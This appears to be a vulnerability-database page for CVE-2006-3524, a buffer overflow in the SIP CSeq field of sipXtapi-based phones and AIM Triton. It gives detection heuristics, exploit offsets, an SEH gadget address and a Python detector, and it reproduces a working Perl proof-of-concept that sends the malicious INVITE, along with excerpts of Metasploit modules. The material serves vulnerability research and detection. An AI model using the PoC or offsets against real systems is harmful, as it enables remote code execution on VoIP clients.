CVE-2006-3524
Published 2006-07-12
Priority P3 · 55 · high · CVSS 2.0 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit available
EPSS 66.99% (99.2nd percentile)

Buffer overflow in SIPfoundry sipXtapi released before 20060324 allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.
Detection & IOCs (extracted from sources)

Commands / probes:
- INVITE sip:<user>@127.0.0.1 SIP/2.0 with an oversized CSeq header (260+ bytes, SEH overwrite at offset 252; sipXezPhone module)
- INVITE sip:<user>@127.0.0.1 SIP/2.0 with an oversized CSeq header (792+ bytes, SEH overwrite at offset 780; AIM Triton module)

Detection:
- Detect oversized SIP CSeq header values in INVITE messages over UDP. A legitimate value is a short sequence number followed by a method name; the PoC sends a value far outside that, padded with filler up to the overwrite (the Perl PoC below uses a fixed digit string and a 4-byte EIP placeholder; the Metasploit modules follow the filler with an SEH record and shellcode).
- Alert on SIP INVITE packets arriving on UDP/5060 or UDP/5061 where the CSeq value is abnormally long (hundreds of bytes rather than a short integer plus a method string). 5061 is conventionally the SIP-over-TLS port, so watching it over UDP costs little but is not where this traffic normally appears.
- Bad characters filtered by the exploit payloads are \x00\x0a\x20\x09\x0d, so shellcode in the CSeq field will contain none of them. A long CSeq value with none of these bytes is a usable heuristic for encoded shellcode in a SIP header; a legitimate value always contains at least one space (\x20).
- The 2006 PoC's CSeq value begins with the fixed byte sequence 31 31 35 37 39 32 30 38 39 32 33 37 33 31 36 31 39 35 34 32 33 35 37 30 (ASCII "115792089237316195423570") followed by a 4-byte EIP overwrite value. This signature matches only that PoC; the Metasploit modules build their own filler, so pair it with the length check.
- The AIM Triton module's SEH overwrite points at a gadget at 0x4017b3d9 in coolcore45.dll, a DLL shipped with AIM Triton. The DLL being loaded is normal and not an indicator by itself; the little-endian bytes of that address (d9 b3 17 40) inside a CSeq value are.
- SEH-based exploitation: the overwritten exception registration record begins at CSeq-value offset 252 (sipXezPhone) or 780 (AIM Triton) within SIP INVITE traffic.

Notes:
- The sipXezPhone Metasploit module uses a single universal target with a hardcoded SEH gadget; no version-specific offsets are provided, so the same payload is attempted against every 0.35a install.
- The AIM Triton module sets EXITFUNC=seh rather than process or thread. EXITFUNC is the payload's exit technique, not how the exploit gains control: with seh the shellcode does not end with a clean ExitProcess/ExitThread call and instead relies on exception handling to unwind, so whether and how the host process dies depends on the payload, and detection based purely on process termination may miss successful exploitation.
- Payload space is limited to 400 bytes in both the sipXezPhone and AIM Triton modules; a large single-stage payload will not fit, so a staged payload (a small stager that fetches the rest) is the usual choice.
- The PoC sends a single UDP datagram with no reliability mechanism; if the packet is lost the exploit fails silently, with no error indication to the attacker.
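Added example, written for this page rather than taken from the advisory, the Exploit-DB entries or the Metasploit modules listed here: it applies the CSeq heuristics above to raw UDP payloads with a minimal SIP request parser, the length and RFC 3261 format checks, the 2006 PoC filler signature, the AIM Triton handler-address bytes and the bad-character heuristic. The sample INVITEs, the 64-byte length threshold and the 192.0.2.x addresses are constructed for the example; the exploit-shaped sample reproduces only the layout of the AIM Triton module's CSeq value (filler, nSEH slot, handler address, payload-sized blob), not its contents.

```python
import re
from dataclasses import dataclass, field

# RFC 3261 CSeq syntax: 1*DIGIT LWS Method. Anything else is malformed.
CSEQ_RE = re.compile(rb"^\d{1,10}[ \t]+[A-Za-z0-9_.!%*+`'~-]+$")

# Values taken from the IOC list on this page.
POC_CSEQ_PREFIX = b"115792089237316195423570"                # fixed filler in the 2006 Perl PoC
AIM_TRITON_SEH_HANDLER = (0x4017B3D9).to_bytes(4, "little")  # gadget address in coolcore45.dll
EXPLOIT_BADCHARS = frozenset(b"\x00\x0a\x20\x09\x0d")        # bytes the exploit payloads avoid

MAX_SANE_CSEQ_LEN = 64  # assumption: "<seq> <METHOD>" never gets anywhere near this legitimately


@dataclass
class Verdict:
    method: str
    cseq_len: int
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_sip_request(datagram: bytes):
    """Split a SIP request into (method, {lowercased header name: [raw values]}).

    Only the header block is examined; a body after the blank line is ignored.
    Returns (None, {}) when the first line does not look like a request line.
    """
    head = datagram.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    if b" " not in lines[0]:
        return None, {}
    method = lines[0].split(b" ", 1)[0].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip(b" \t"))
    return method, headers


def inspect_datagram(datagram: bytes) -> Verdict:
    """Apply the CSeq heuristics from the IOC list to one UDP payload."""
    method, headers = parse_sip_request(datagram)
    values = headers.get(b"cseq", [])
    if method is None or not values:
        return Verdict(method or "", 0)
    cseq = values[0]
    v = Verdict(method, len(cseq))
    if len(cseq) > MAX_SANE_CSEQ_LEN:
        v.reasons.append(f"oversized CSeq value ({len(cseq)} bytes)")
    if not CSEQ_RE.match(cseq):
        v.reasons.append("CSeq value is not '<digits> <Method>'")
    if cseq.startswith(POC_CSEQ_PREFIX):
        v.reasons.append("CSeq value starts with the 2006 PoC filler")
    off = cseq.find(AIM_TRITON_SEH_HANDLER)
    if off != -1:
        v.reasons.append(f"AIM Triton SEH handler address 0x4017b3d9 at value offset {off}")
    if len(cseq) > MAX_SANE_CSEQ_LEN and not EXPLOIT_BADCHARS & set(cseq):
        v.reasons.append("long value contains none of the exploits' bad characters")
    return v


def build_invite(cseq_value: bytes) -> bytes:
    """Constructed sample INVITE (not captured traffic); only the CSeq value varies."""
    return b"\r\n".join([
        b"INVITE sip:bob@192.0.2.10 SIP/2.0",
        b"Via: SIP/2.0/UDP 192.0.2.20:5060",
        b'From: "alice" <sip:alice@192.0.2.20>',
        b"To: <sip:bob@192.0.2.10>",
        b"Call-ID: a84b4c76e66710@192.0.2.20",
        b"CSeq: " + cseq_value,
        b"Max-Forwards: 70",
        b"Contact: <sip:alice@192.0.2.20>",
        b"", b"",
    ])


BENIGN = build_invite(b"314159 INVITE")
POC_SHAPED = build_invite(POC_CSEQ_PREFIX + b"AAAA")  # same value as the Perl PoC below
# Layout of the AIM Triton module's value: 780 filler bytes, a 4-byte nSEH slot, the handler
# address, then a payload-sized blob. Filler and blob here are plain letters, not shellcode.
MSF_SHAPED = build_invite(b"A" * 780 + b"BBBB" + AIM_TRITON_SEH_HANDLER + b"C" * 400)

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("poc", POC_SHAPED), ("msf", MSF_SHAPED)):
        v = inspect_datagram(pkt)
        print(f"{name:7} {v.method:7} cseq_len={v.cseq_len:5} suspicious={v.suspicious} {v.reasons}")
```

The PoC value is only 28 bytes, so the length check alone would miss it; the format check (digits must be followed by whitespace and a method) is what catches it, while the length and bad-character checks catch module-sized values. Run the block directly to print one verdict per sample.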
No detection rules found.
Exploit-DB
SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)
exploitdb · 2010-06-15 · CVE-2006-3524
---
##
# $Id: sipxezphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in SIPfoundry's
          sipXezPhone version 0.35a. By sending a long CSeq header,
          a remote attacker could overflow a buffer and execute
          arbitrary code on the system with the privileges of
          the affected application.
      },
      'Author'         => 'MC',
      'Version'        => '$Revision: 95
Exploit-DB
AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)
exploitdb · 2010-06-15 · CVE-2006-3524
---
##
# $Id: aim_triton_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in AOL\'s AIM
          Triton 1.0.4. By sending an overly long CSeq value,
          a remote attacker could overflow a buffer and execute
          arbitrary code on the system with the privileges of
          the affected application.
      },
      'Author'         => 'MC',
      'Version'        => '$Revision: 9525 $',
      'References'     =>
        [
          ['CVE',
SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2006-3524 SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)
SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)
---
##
# $Id: sipxphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in SIPfoundry's
sipXphone 2.6.0.27. By sending an overly long CSeq value,
a remote attacker could overflow a buffer and execute
arbitrary code on the system with the privileges of
the affected application.
},
'Author' => 'MC',
'Version' => '$Revision: 9
Exploit-DB
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
exploitdb · 2006-07-10 · CVE-2006-3524
---
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
use Socket;          # PF_INET, SOCK_DGRAM, inet_aton, sockaddr_in
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
    print "Usage: sipx.pl \n";
    exit;
}
$target = $ARGV[0];
my $source      = "127.0.0.1";
my $target_port = 5060;
my $user        = "bad";
my $eip  = "\x41\x41\x41\x41";           # 4-byte EIP overwrite placeholder ("AAAA")
my $cseq =
    "\x31\x31\x35\x37\x39\x32\x30\x38".   # ASCII "11579208"
    "\x39\x32\x33\x37\x33\x31\x36\x31".   # ASCII "92373161"
    "\x39\x35\x34\x32\x33\x35\x37\x30".   # ASCII "95423570"
    $eip;
# SIP INVITE carrying the malformed CSeq value; the \r before each newline gives CRLF line endings.
# The request line, the To header and the <sip:...> URIs are restored here (the page's HTML
# stripping removed everything between angle brackets); the header values are an assumption.
my $packet = <<END;
INVITE sip:$user\@$target SIP/2.0\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz" <sip:$user\@$target>\r
To: <sip:$user\@$target>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$user\@$target>\r
\r
END
print "Sending Packet to: " . $target . "\n\n";
# Single UDP datagram, no reply is read: a lost packet means silent failure.
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "socket: $!";
my $ipaddr   = inet_aton($target) or die "cannot resolve $target: $!";
my $portaddr = sockaddr_in($target_port, $ipaddr);
send(PING, $packet, 0, $portaddr) == length($packet)
    or die "cannot send to $target:$target_port: $!";
close(PING);
Metasploit
SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
This module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

Metasploit
SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending a long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

Metasploit
AIM Triton 1.0.4 CSeq Buffer Overflow
This module exploits a buffer overflow in AOL's AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.
No writeups or analysis indexed.
References
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047757.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047794.html
http://secunia.com/advisories/20997
http://securitytracker.com/id?1016455
http://www.osvdb.org/27122
http://www.securityfocus.com/archive/1/439617/100/0/threaded
http://www.securityfocus.com/archive/1/440135/100/0/threaded
http://www.securityfocus.com/bid/18906
http://www.vupen.com/english/advisories/2006/2735
https://exchange.xforce.ibmcloud.com/vulnerabilities/27681